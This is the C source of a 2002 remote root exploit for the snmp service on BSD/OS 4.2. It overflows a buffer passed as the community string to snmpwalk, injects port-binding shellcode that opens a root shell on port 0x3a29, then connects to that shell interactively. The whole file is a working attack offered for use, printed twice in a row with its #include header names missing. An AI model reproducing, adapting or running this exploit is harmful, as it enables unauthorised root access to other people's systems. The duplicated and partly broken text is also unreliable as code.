/* * 0x3a0x29snmp.c - BSD/OS 4.2 (i86) snmp remote root exploit * * By: Safety and dekadish (Feb 2002) * * * The #smile Crew * * Version: 0.1 * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define SNMPWALK "/usr/bin/snmpwalk"/* Path to the snmpwalk program. You might want to change it */ #define RETADDR 0x8045834 #define BUFLEN 260 #define NOP 0x90 /* Portbind shellcode by bighawk - Port 0x3a29 (what else?) */ char shellkod[] = "\xb8\xff\xf8\xff\x3c" // mov eax, 03cfff8ffh "\xf7\xd0" // not eax "\x50" // push eax "\x31\xc0" // xor eax, eax "\xb0\x9a" // mov al, 09ah "\x50" // push eax "\x89\xe7" // mov edi, esp "\x31\xdb" // xor ebx, ebx "\xf7\xe3" // mul ebx "\x53" // push ebx "\x43" // inc ebx "\x53" // push ebx "\x43" // inc ebx "\x53" // push ebx "\xb0\x61" // mov al, 97 "\xff\xd7" // call edi "\x89\xc6" // mov esi, eax "\x52" // push edx "\x66\x68\x3a\x29" // push word 4135 "\x66\x53" // push bx "\x89\xe5" // mov ebp, esp "\x6a\x10" // push byte 16 "\x55" // push ebp "\x56" // push esi "\xb0\x68" // mov al, 104 "\xff\xd7" // call edi "\xb0\x6a" // mov al, 106 "\xff\xd7" // call edi "\x52" // push edx "\x52" // push edx "\x56" // push esi "\xb0\x1e" // mov al, 30 "\xff\xd7" // call edi "\x53" // push ebx "\x50" // push eax "\xb0\x5a" // mov al, 90 "\xff\xd7" // call edi "\x4b" // dec ebx "\x79\xf7" // jns duploop "\x50" // push eax "\x68\x2f\x2f\x73\x68" // push dword 68732f2fh "\x68\x2f\x62\x69\x6e" // push dword 6e69622fh "\x89\xe3" // mov ebx, esp "\x50" // push eax "\x54" // push esp "\x53" // push ebx "\xb0\x3b" // mov al, 59 "\xff\xd7"; char *buffer; char fippla(u_long ret); int connect2shell(char *ip); int main(int argc, char *argv[]) { int ret; pid_t pid; fprintf(stderr, "%s\n", "[The #smile Crew]"); if (argc != 2) { fprintf(stderr, "Usage: %s \n\n", argv[0]); exit(-1); } fippla(RETADDR); pid = fork(); if (pid == -1) { fprintf(stderr, "fork() failed\n"); exit(-1); } if (!pid) { if(execl(SNMPWALK, "snmpwalk", argv[1], "-c", buffer, 0) == -1) { fprintf(stderr, "Unable to run snmpwalk (correct path?)\n"); exit(-1); } } else waitpid(pid, &ret, 0); connect2shell(argv[1]); free(buffer); return; } char fippla(u_long ret) { int i; buffer = (char *)malloc(BUFLEN); for (i = 0; i < 256 ; i++) *(buffer+i) = NOP; memcpy(buffer + (BUFLEN - strlen(shellkod)) -5, shellkod, strlen(shellkod)); for (i = 0; i < 115;) { buffer[i++] = (ret & 0xff); buffer[i++] = (ret >> 8) & 0xff; buffer[i++] = (ret >> 16) & 0xff; buffer[i++] = (ret >> 24) & 0xff; } return(1); } int connect2shell(char *ip) { char *buf; fd_set fds; int s, n, ret; struct sockaddr_in sock; sock.sin_family = AF_INET; sock.sin_port = htons(0x3a29); sock.sin_addr.s_addr = inet_addr(ip); s = socket(AF_INET, SOCK_STREAM, 0); ret = connect(s, (struct sockaddr *)&sock, sizeof(sock)); if (ret) { printf("Exploit failed\n"); exit(0); } else printf("[0x3a0x29] CONNECTED [0x3a0x29]\n\n"); dprintf(s, "/usr/bin/id; /usr/bin/uname -a;\n"); buf = (char *)malloc(512); memset(buf, 0, 512); while (1) { FD_SET(0, &fds); FD_SET(s, &fds); select((s+1), &fds, 0, 0, 0); if (FD_ISSET(0, &fds)) { n = read(0, buf, 511); if (n < 1) { fprintf(stderr, "read() error\n"); exit(-1); } write(s, buf, n); } if (FD_ISSET(s, &fds)) { n = read(s, buf, 511); if (n < 0) { fprintf(stderr, "read() error\n"); exit(-1); } else if (!n) { printf("Disconnected\n"); exit(0); } write(1, buf, n); } } free(buf); return; }/* * 0x3a0x29snmp.c - BSD/OS 4.2 (i86) snmp remote root exploit * * By: Safety and dekadish (Feb 2002) * * * The #smile Crew * * Version: 0.1 * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define SNMPWALK "/usr/bin/snmpwalk"/* Path to the snmpwalk program. You might want to change it */ #define RETADDR 0x8045834 #define BUFLEN 260 #define NOP 0x90 /* Portbind shellcode by bighawk - Port 0x3a29 (what else?) */ char shellkod[] = "\xb8\xff\xf8\xff\x3c" // mov eax, 03cfff8ffh "\xf7\xd0" // not eax "\x50" // push eax "\x31\xc0" // xor eax, eax "\xb0\x9a" // mov al, 09ah "\x50" // push eax "\x89\xe7" // mov edi, esp "\x31\xdb" // xor ebx, ebx "\xf7\xe3" // mul ebx "\x53" // push ebx "\x43" // inc ebx "\x53" // push ebx "\x43" // inc ebx "\x53" // push ebx "\xb0\x61" // mov al, 97 "\xff\xd7" // call edi "\x89\xc6" // mov esi, eax "\x52" // push edx "\x66\x68\x3a\x29" // push word 4135 "\x66\x53" // push bx "\x89\xe5" // mov ebp, esp "\x6a\x10" // push byte 16 "\x55" // push ebp "\x56" // push esi "\xb0\x68" // mov al, 104 "\xff\xd7" // call edi "\xb0\x6a" // mov al, 106 "\xff\xd7" // call edi "\x52" // push edx "\x52" // push edx "\x56" // push esi "\xb0\x1e" // mov al, 30 "\xff\xd7" // call edi "\x53" // push ebx "\x50" // push eax "\xb0\x5a" // mov al, 90 "\xff\xd7" // call edi "\x4b" // dec ebx "\x79\xf7" // jns duploop "\x50" // push eax "\x68\x2f\x2f\x73\x68" // push dword 68732f2fh "\x68\x2f\x62\x69\x6e" // push dword 6e69622fh "\x89\xe3" // mov ebx, esp "\x50" // push eax "\x54" // push esp "\x53" // push ebx "\xb0\x3b" // mov al, 59 "\xff\xd7"; char *buffer; char fippla(u_long ret); int connect2shell(char *ip); int main(int argc, char *argv[]) { int ret; pid_t pid; fprintf(stderr, "%s\n", "[The #smile Crew]"); if (argc != 2) { fprintf(stderr, "Usage: %s \n\n", argv[0]); exit(-1); } fippla(RETADDR); pid = fork(); if (pid == -1) { fprintf(stderr, "fork() failed\n"); exit(-1); } if (!pid) { if(execl(SNMPWALK, "snmpwalk", argv[1], "-c", buffer, 0) == -1) { fprintf(stderr, "Unable to run snmpwalk (correct path?)\n"); exit(-1); } } else waitpid(pid, &ret, 0); connect2shell(argv[1]); free(buffer); return; } char fippla(u_long ret) { int i; buffer = (char *)malloc(BUFLEN); for (i = 0; i < 256 ; i++) *(buffer+i) = NOP; memcpy(buffer + (BUFLEN - strlen(shellkod)) -5, shellkod, strlen(shellkod)); for (i = 0; i < 115;) { buffer[i++] = (ret & 0xff); buffer[i++] = (ret >> 8) & 0xff; buffer[i++] = (ret >> 16) & 0xff; buffer[i++] = (ret >> 24) & 0xff; } return(1); } int connect2shell(char *ip) { char *buf; fd_set fds; int s, n, ret; struct sockaddr_in sock; sock.sin_family = AF_INET; sock.sin_port = htons(0x3a29); sock.sin_addr.s_addr = inet_addr(ip); s = socket(AF_INET, SOCK_STREAM, 0); ret = connect(s, (struct sockaddr *)&sock, sizeof(sock)); if (ret) { printf("Exploit failed\n"); exit(0); } else printf("[0x3a0x29] CONNECTED [0x3a0x29]\n\n"); dprintf(s, "/usr/bin/id; /usr/bin/uname -a;\n"); buf = (char *)malloc(512); memset(buf, 0, 512); while (1) { FD_SET(0, &fds); FD_SET(s, &fds); select((s+1), &fds, 0, 0, 0); if (FD_ISSET(0, &fds)) { n = read(0, buf, 511); if (n < 1) { fprintf(stderr, "read() error\n"); exit(-1); } write(s, buf, n); } if (FD_ISSET(s, &fds)) { n = read(s, buf, 511); if (n < 0) { fprintf(stderr, "read() error\n"); exit(-1); } else if (!n) { printf("Disconnected\n"); exit(0); } write(1, buf, n); } } free(buf); return; }